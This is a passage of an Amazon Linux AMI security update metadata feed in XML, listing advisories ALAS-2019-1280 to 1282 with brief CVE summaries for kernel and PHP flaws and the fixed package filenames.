arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.77-69.57.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2019-1280</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1280: medium priority package update for kernel</title><issued date="2019-09-13 22:45:00" /><updated date="2019-09-18 21:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-9363:
A buffer overflow due to a signed-unsigned comparison was found in hidp_process_report() in net/bluetooth/hidp/core.c in the Linux kernel. The buffer length is an unsigned int but gets cast to a signed int, which in certain conditions can lead to a system panic and a denial of service.
1623067:
CVE-2018-9363 kernel: Buffer overflow in hidp_process_report
CVE-2018-15594:
It was found that the paravirt_patch_call/jump() functions in arch/x86/kernel/paravirt.c in the Linux kernel mishandle certain indirect calls, which makes it easier for attackers to conduct Spectre-v2 attacks against paravirtualized guests.
1620555:
CVE-2018-15594 kernel: Mishandling of indirect calls weakens Spectre mitigation for paravirtual guests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15594" title="" id="CVE-2018-15594" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9363" title="" id="CVE-2018-9363" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.67" release="66.56.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.67-66.56.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.67-66.56.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.67-66.56.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.67-66.56.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.67-66.56.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.67-66.56.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.67-66.56.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.67-66.56.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.67-66.56.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.67" release="66.56.amzn1" epoch="0" 
arch="i686"><filename>Packages/perf-4.14.67-66.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1281</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1281: medium priority package update for kernel</title><issued date="2019-09-13 22:48:00" /><updated date="2019-09-18 21:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-15902:
A backporting error was discovered in the Linux stable/longterm kernel 4.4.x through 4.4.190, 4.9.x through 4.9.190, 4.14.x through 4.14.141, 4.19.x through 4.19.69, and 5.2.x through 5.2.11. Misuse of the upstream &quot;x86/ptrace: Fix possible spectre-v1 in ptrace_get_debugreg()&quot; commit reintroduced the Spectre vulnerability that it aimed to eliminate. This occurred because the backport process depends on cherry picking specific commits, and because two (correctly ordered) code lines were swapped.
1752081:
CVE-2019-15902 kernel: backporting error in ptrace_get_debugreg()
CVE-2019-15538:
An issue was discovered in xfs_setattr_nonsize in fs/xfs/xfs_iops.c in the Linux kernel through 5.2.9. XFS partially wedges when a chgrp fails on account of being out of disk quota. xfs_setattr_nonsize is failing to unlock the ILOCK after the xfs_qm_vop_chown_reserve call fails. This is primarily a local DoS attack vector, but it might result as well in remote DoS if the XFS filesystem is exported for instance via NFS.
1746777:
CVE-2019-15538 kernel: denial of service in xfs_setattr_nonsize in fs/xfs/xfs_iops.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15538" title="" id="CVE-2019-15538" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15902" title="" id="CVE-2019-15902" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.143" release="91.122.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-devel-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.143-91.122.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.143-91.122.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.143-91.122.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.143-91.122.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.143-91.122.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.143-91.122.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.143-91.122.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.143-91.122.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.143-91.122.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.143" release="91.122.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-debuginfo-4.14.143-91.122.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1282</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1282: medium priority package update for php71 php72 php73</title><issued date="2019-09-13 22:49:00" /><updated date="2019-09-18 21:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9640:
An issue was discovered in the EXIF component in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. There is an Invalid Read in exif_process_SOFn.
1688939:
CVE-2019-9640 php: Invalid read in exif_process_SOFn()
CVE-2019-9637:
An issue was discovered in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. Due to the way rename() across filesystems is implemented, it is possible that the file being renamed is briefly available with wrong permissions while the rename is ongoing, thus enabling unauthorized users to access the data.
1688897:
CVE-2019-9637 php: File rename across filesystems may allow unwanted access during processing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9637" title="" id="CVE-2019-9637" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9640" title="" id="CVE-2019-9640" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php71-debuginfo" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.27" release="1.37.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package 
name="php71-gmp" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.27" release="1.37.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php71-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.27" release="1.37.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-opcache-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.27" release="1.37.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-recode-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.16" release="1.11.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" 
version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.16" release="1.11.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php72-pspell-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.16" release="1.11.amzn1" epoch="0" 